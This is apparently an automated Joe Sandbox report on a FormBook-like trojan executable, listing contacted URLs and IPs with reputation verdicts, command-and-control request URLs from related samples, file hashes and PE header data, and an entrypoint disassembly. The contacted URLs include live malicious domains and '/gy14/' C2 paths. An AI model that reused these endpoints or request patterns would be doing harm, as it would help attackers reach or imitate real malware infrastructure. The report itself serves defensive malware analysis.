                                                http://www.roelofsen.onlineReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.883831.com/gy14/www.venitro.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.artbydianayorktownva.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.sgyy3ej2dgwesb5.com/gy14/www.883831.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://schemas.microexplorer.exe, 00000002.00000002.3300780586.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3303691234.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3303668178.0000000007B50000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sgyy3ej2dgwesb5.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.soulheroes.online/gy14/www.roelofsen.onlineexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.ampsportss.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.theanhedonia.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.budgetnurseries.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.budgetnurseries.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.roelofsen.online/gy14/www.truedatalab.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.whatsapp1.autos/gy14/explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.whatsapp1.autosReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.artbydianayorktownva.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.budgetnurseries.com/gy14/www.mtdiyx.xyzexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.soulheroes.onlineexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.twinklethrive.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.twinklethrive.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://excel.office.com-explorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.elbt-ag.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.elbt-ag.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.soulheroes.online/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://powerpoint.office.comEMdexplorer.exe, 00000002.00000002.3309996442.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.123bu6.shop/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: phishing
                                                                  		unknown
                                                                  http://www.mtdiyx.xyz/gy14/www.elbt-ag.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: phishing
                                                                  		unknown
                                                                  https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.theanhedonia.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://api.msn.com/explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.truedatalab.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          103.224.212.212
                                                                          		www.theanhedonia.comAustralia
                                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                          104.21.34.218
                                                                          		www.123bu6.shopUnited States
                                                                          		13335CLOUDFLARENETUStrue

                                                                          General Information

                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                          Analysis ID:1392769
                                                                          Start date and time:2024-02-15 12:13:55 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 32s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:1
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:jqPZZhDmjh.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@6/0@5/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 32
                                                                          • Number of non-executed functions: 318
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          12:14:46API Interceptor1794750x Sleep call for process: explorer.exe modified
                                                                          12:15:27API Interceptor2229284x Sleep call for process: raserver.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          103.224.212.212z2______________________________.exeGet hashmaliciousFormBookBrowse
                                                                          • www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-
                                                                          file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                          • soclaiebn.xyz/PhpMyAdmin/
                                                                          22#U0415.exeGet hashmaliciousFormBookBrowse
                                                                          • www.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58
                                                                          RFQ-T56797W_1.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                                                          • www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
                                                                          GCeHcfCef8.exeGet hashmaliciousFormBookBrowse
                                                                          • www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
                                                                          Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
                                                                          SWIFT_LETTER_A1OzGLOB0NH2.exeGet hashmaliciousFormBookBrowse
                                                                          • www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
                                                                          104.21.34.218BANCO_SWIFT_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.123bu6.shop/gy14/?FdRh-V3p=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f7VLjYjipa2&ch=VRdlCLfpIntToNx

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.123bu6.shopfoWlKxevLl.exeGet hashmaliciousFormBookBrowse
                                                                          • 172.67.165.153
                                                                          BANCO_SWIFT_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 104.21.34.218
                                                                          #U00d6denmemi#U015f_#U00d6demelerin_Kapat#U0131lmas#U0131.exeGet hashmaliciousFormBookBrowse
                                                                          • 172.67.165.153
                                                                          www.truedatalab.comz14POO230487PDF.exeGet hashmaliciousFormBookBrowse
                                                                          • 0.0.0.0
                                                                          www.theanhedonia.comz2______________________________.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.212
                                                                          22#U0415.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.212

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TRELLIAN-AS-APTrellianPtyLimitedAUDocumento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.213
                                                                          2024-09C33T37.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.213
                                                                          z2______________________________.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.212
                                                                          Confirm PDF.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.214
                                                                          rBCPcomprobante.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.213
                                                                          http://yaatde.comGet hashmaliciousUnknownBrowse
                                                                          • 103.224.182.206
                                                                          Purchase_Order_PA056223.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 103.224.212.216
                                                                          jYLXwtSJOP.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.212.214
                                                                          AL5052H32.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 103.224.212.215
                                                                          SsQblB4e3Y.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                          • 103.224.182.210
                                                                          CLOUDFLARENETUS4_#U0417#U0430#U043f#U0438#U0442_doc.docx.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.154.29
                                                                          Documento de Orden de Compra de MOLDPLAST S L OC 1580070560.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 104.21.70.66
                                                                          DOC_HAWB2045829822.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.74.152
                                                                          SWU09rshi6.elfGet hashmaliciousMiraiBrowse
                                                                          • 1.15.79.213
                                                                          9YSPntrlvv.elfGet hashmaliciousUnknownBrowse
                                                                          • 1.15.80.106
                                                                          PO.XJ210821Q.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 104.26.13.205
                                                                          CF2B105817DD297DFB27D156F9C5BD2B511A74C4B8E56.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 104.21.31.169
                                                                          qa50Bam2AS.elfGet hashmaliciousUnknownBrowse
                                                                          • 172.69.147.255
                                                                          #U0417#U0430#U043f#U0438#U0442_doc.docx.exeGet hashmaliciousLummaCBrowse
                                                                          • 172.67.154.29
                                                                          #U0417#U0430#U043f#U0438#U0442_doc.docx.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.59.108

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          No created / dropped files found

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.3910560197330035
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:jqPZZhDmjh.exe
                                                                          File size:185'856 bytes
                                                                          MD5:c4127213fc83e9b8d166d5731bac598a
                                                                          SHA1:c54a87820173ca9fae8809dcc7e99f54b2dac173
                                                                          SHA256:ca6d88ac1635e12fbcea10c6db09f229893ae4d2645830481625dcd4c465e498
                                                                          SHA512:ca28c7b389239c76b1261374c55e48e22bc87a4bc55eb744a1ea834bb08a1df0ea5d6d40989f742de63c72faf70babd61a0c94867a5710b0d162adfb81b026ed
                                                                          SSDEEP:3072:kh5MEfXo5Fwd38wi8kHaJ47Fxp00CABkW+ALRYpnz:kxFR8b8QaJ47bp0BGkW+f
                                                                          TLSH:0B04AE36D602C070F2B215B5B66D1B7B883D0E357294A4EAA3E12AE05FE48D5F53931F
                                                                          File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L......F...................................................

                                                                          File Icon

                                                                          Icon Hash:00928e8e8686b000

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x187f080
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x1860000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x469FFD15 [Fri Jul 20 00:08:53 2007 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          sub esp, 64h
                                                                          call 00007FC1848F4C9Ah
                                                                          mov esp, ebp
                                                                          pop ebp
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          call 00007FC1848F4CE3h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          jmp 00007FC1848F4D46h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66B4h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66B7h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66BAh
                                                                          ret
